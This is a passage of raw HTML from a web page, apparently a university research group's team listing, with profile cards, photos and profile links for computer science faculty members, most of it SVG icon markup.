11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 